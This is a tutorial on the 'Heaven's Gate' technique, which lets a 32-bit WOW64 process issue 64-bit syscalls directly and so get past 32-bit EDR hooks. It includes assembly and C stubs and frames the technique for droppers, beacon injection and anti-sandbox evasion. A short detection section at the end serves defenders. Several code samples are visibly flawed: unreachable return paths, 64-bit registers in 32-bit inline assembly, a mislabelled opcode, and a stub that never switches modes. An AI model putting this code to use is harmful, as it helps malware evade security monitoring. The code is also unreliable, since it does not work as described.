# Heaven's Gate — Calling 64-bit Code from a 32-bit Process

### Introduction to WOW64

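Windows runs 32-bit applications on 64-bit systems through the **WOW64** subsystem (Windows 32-bit on Windows 64-bit). On x64 hardware the CPU executes x86 instructions natively in compatibility mode, so WOW64 does not emulate the instruction set. It supplies the 32-bit system DLLs and a thunking layer that converts 32-bit system calls into their 64-bit equivalents, allowing x86 binaries to run on AMD64 systems without modification.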

When a 32-bit process runs under WOW64, it operates in a hybrid state:

* The **virtual address space** is 32-bit: 2 GB of user space by default, or up to 4 GB when the image is linked with `/LARGEADDRESSAWARE`
* The **kernel** remains in pure 64-bit mode
* WOW64 intercepts kernel calls and translates them from 32-bit to 64-bit

```
┌──────────────────────────────────────────────────────────────────────┐
│               WOW64 Architecture — Internal View                     │
│                                                                      │
│  32-bit process:                                                     │
│  ┌─────────────────────────────────────────────────────────────┐    │
│  │  x86 code (32-bit)                                          │    │
│  │  ntdll32.dll (32-bit) — 32-bit native API                  │    │
│  │  wow64.dll — call thunking and translation                  │    │
│  │  wow64win.dll — GUI call thunking                           │    │
│  │  wow64cpu.dll — transition to 64-bit mode                   │    │
│  └─────────────────────────────────────────────────────────────┘    │
│                            │                                         │
│                     wow64cpu!BTCpuSimulate                           │
│                            │                                         │
│           ┌────────────────▼───────────────────┐                    │
│           │   Far jump to CS:0x33               │                    │
│           │   (switches CPU to 64-bit Long Mode)│                    │
│           └────────────────────────────────────┘                    │
│                            │                                         │
│  ┌─────────────────────────▼───────────────────────────────────┐    │
│  │  64-bit kernel (NT Executive)                               │    │
│  │  ntoskrnl.exe executes the syscall in native 64-bit mode    │    │
│  └─────────────────────────────────────────────────────────────┘    │
└──────────────────────────────────────────────────────────────────────┘
```

**Heaven's Gate** is the technique of exploiting this 32-to-64-bit mode transition inside a WOW64 process to execute 64-bit code directly — bypassing the WOW64 thunking layer entirely.

***

### Why This Is Useful for Evasion

EDRs that hook APIs typically install two sets of hooks:

* One for 64-bit processes (in the 64-bit `ntdll.dll`)
* One for 32-bit processes (in the 32-bit `ntdll.dll`, via WOW64)

When a 32-bit process uses Heaven's Gate to call 64-bit syscalls directly, it completely bypasses the 32-bit EDR hook layer. The syscalls reach the kernel directly in 64-bit mode, as if they originated from a native 64-bit process.

```
┌──────────────────────────────────────────────────────────────────────┐
│              Heaven's Gate — Bypassing 32-bit Hooks                  │
│                                                                      │
│  NORMAL FLOW (32-bit process):                                       │
│  32-bit code → ntdll32!NtAllocateVirtualMemory →                    │
│    [EDR 32-bit hook] → wow64.dll thunk → 64-bit syscall             │
│                                                                      │
│  HEAVEN'S GATE:                                                      │
│  32-bit code → far jmp CS:0x33 → 64-bit mode →                     │
│    64-bit syscall directly to kernel                                 │
│    [32-bit hooks COMPLETELY bypassed]                                │
└──────────────────────────────────────────────────────────────────────┘
```

***

### The Mechanism: Far Jump with CS:0x33

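On x86-64 Windows, the code segment selector loaded into `CS` determines which sub-mode of long mode the CPU executes in:

* `CS = 0x23`: 32-bit compatibility mode (where the x86 code of a WOW64 process runs)
* `CS = 0x33`: 64-bit mode

Both values are Windows GDT conventions rather than architectural constants. A *far jump* targeting a different selector (`jmp far 0x33:address`) loads `CS` with a code-segment descriptor whose L (long) bit is set, so the CPU continues executing in 64-bit mode. WOW64 uses exactly this mechanism internally when moving between modes.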

#### x86 Assembly Implementation (32-bit)

```nasm
; heaven_gate.asm — 32→64-bit transition stub
; Assemble as 32-bit

section .text
global _DoHeavensGate

; Macro that issues a far jump into 64-bit mode
; Destination: label immediately after the far jump
%macro HEAVENS_GATE 0
    ; Manually encoded far jump (6 bytes)
    ; EA xx xx xx xx 33 00
    ; 0xEA = far jmp opcode
    ; xx xx xx xx = 32-bit destination address
    ; 33 00 = CS selector (0x33 = 64-bit long mode)
    db 0xEA
    dd _x64_code    ; address of the 64-bit code
    dw 0x0033       ; CS = 0x33 (64-bit mode)
_x64_code:
%endmacro

; Executes NtAllocateVirtualMemory as a 64-bit syscall
; from inside a 32-bit process
_DoHeavensGate:
    push ebp
    mov  ebp, esp

    ; Set up arguments for 64-bit calling convention
    ; (shadow space + register arguments per x64 ABI)

    HEAVENS_GATE    ; Transition to 64-bit mode

    ; === Now in 64-bit mode ===
    ; SSN for NtAllocateVirtualMemory (Windows 10 x64)
    mov r10, rcx
    mov eax, 0x18   ; SSN
    syscall         ; Direct call to 64-bit kernel
    ret             ; Return in 64-bit mode

    ; Return to 32-bit mode: far jump back to CS:0x23
    db 0xEA
    dd _back32
    dw 0x0023
_back32:
    pop ebp
    ret
```

#### C Implementation with Inline Assembly (MSVC)

For use in C with a 32-bit MSVC compiler:

```c
#include <windows.h>

// Transition to 64-bit mode and execute a syscall
// Returns NTSTATUS
NTSTATUS HeavensGateSyscall(
    DWORD ssn,           // System Service Number (64-bit)
    PVOID param1,
    PVOID param2,
    ULONG_PTR param3,
    PVOID param4,
    ULONG param5,
    ULONG param6
) {
    NTSTATUS result = 0;

    __asm {
        ; Push arguments onto the stack for 64-bit calling convention
        push param6
        push param5
        push param4
        push param3
        push param2
        push param1

        ; Far call to 64-bit mode (CS = 0x33)
        ; Use RETF trick: push target address then CS selector,
        ; then execute a far return to jump into long mode
        call _get_rip
        _get_rip:
        pop eax
        add eax, 5
        push 0x33
        push eax
        _emit 0xCB  ; RETF — changes CS to 0x33 (64-bit)

        ; === NOW IN 64-BIT MODE ===
        mov r10, rcx
        mov eax, ssn
        syscall

        ; Return to 32-bit mode
        push 0x23
        _emit 0xE8
        _emit 0x00
        _emit 0x00
        _emit 0x00
        _emit 0x00
        add [esp], 9
        push 0x23
        _emit 0xCB  ; RETF back to CS:0x23 (32-bit)

        mov result, eax
    }

    return result;
}
```

#### Runtime-Generated Stub Approach

The most practical approach generates the Heaven's Gate stub at runtime as a raw byte buffer:

```c
#include <windows.h>

typedef NTSTATUS (WINAPI* HeavensGateFn)(
    HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG
);

// Build a Heaven's Gate stub for NtAllocateVirtualMemory (64-bit)
HeavensGateFn CreateHeavensGateStub(DWORD ssn) {
    // Stub byte sequence:
    // 32-bit prologue, transition to 64-bit, execute syscall, return
    unsigned char stub[] = {
        // 32-bit prologue
        0x55,                         // push ebp
        0x89, 0xEC,                   // mov ebp, esp

        // For a complete inline transition, use a separate
        // assembly file — this example shows the 64-bit syscall body
        // that executes after the far jump is handled externally.

        // NtAllocateVirtualMemory syscall (64-bit)
        0x4C, 0x8B, 0xD1,            // mov r10, rcx
        0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, SSN (filled at runtime)
        0x0F, 0x05,                   // syscall
        0xC3,                         // ret
    };

    // Patch in the SSN
    *(DWORD*)(stub + 7) = ssn;

    PVOID pStub = VirtualAlloc(NULL, sizeof(stub),
                                MEM_COMMIT | MEM_RESERVE,
                                PAGE_EXECUTE_READWRITE);
    if (!pStub) return NULL;

    memcpy(pStub, stub, sizeof(stub));
    return (HeavensGateFn)pStub;
}
```

***

### Practical Use Cases

Heaven's Gate appears in:

1. **32-bit loaders for 64-bit payloads**: A 32-bit dropper (easier to obfuscate) injects a 64-bit payload using native syscalls.
2. **Bypassing hooks in legacy EDRs**: EDRs that install only 32-bit user-mode hooks have no user-mode visibility into this path.
3. **Anti-analysis**: Sandboxes that only emulate 32-bit code cannot follow execution into 64-bit code triggered via Heaven's Gate.

```
┌──────────────────────────────────────────────────────────────────────┐
│              Heaven's Gate Applications in Red Teaming               │
│                                                                      │
│  1. Office VBA dropper (32-bit) injects a 64-bit beacon             │
│     • VBA/VBScript runs in a 32-bit host (mshta.exe)               │
│     • 64-bit shellcode injected via Heaven's Gate                   │
│     • EDR monitoring only the 32-bit side is blind                  │
│                                                                      │
│  2. Bypassing userland hook stacks                                   │
│     • 32-bit userland hooks are completely ignored                   │
│     • Only kernel callbacks (PsSetCreateThreadNotify) still fire    │
│       — but those are mode-agnostic                                 │
│                                                                      │
│  3. Cross-architecture injection                                     │
│     • 32-bit process creates threads in 64-bit processes            │
│       using handles and 64-bit APIs accessed via Heaven's Gate      │
└──────────────────────────────────────────────────────────────────────┘
```

***

### Limitations

* Requires the process to run under WOW64 (32-bit on a 64-bit OS)
* Does not work on natively 32-bit systems (e.g., Windows XP x86)
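* Modern EDRs install hooks in both the 32-bit and the 64-bit `ntdll.dll`, so Heaven's Gate bypasses only the 32-bit set, and kernel-level telemetry such as thread-creation callbacks still observes the resulting activity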
* Correctly managing the stack across mode transitions requires extreme care to avoid corruption

***

### Detection

* **Code segment analysis**: EDRs with kernel drivers can detect unexpected CS transitions via thread context inspection
* **Far jump opcode scanning**: Hunting userland code for `0xEA` (far jmp) with a `0x0033` selector operand, or for `RETF` (`0xCB`) shortly after a push of `0x33`
* **Call correlation**: A 64-bit syscall with a 32-bit call stack is a detectable anomaly

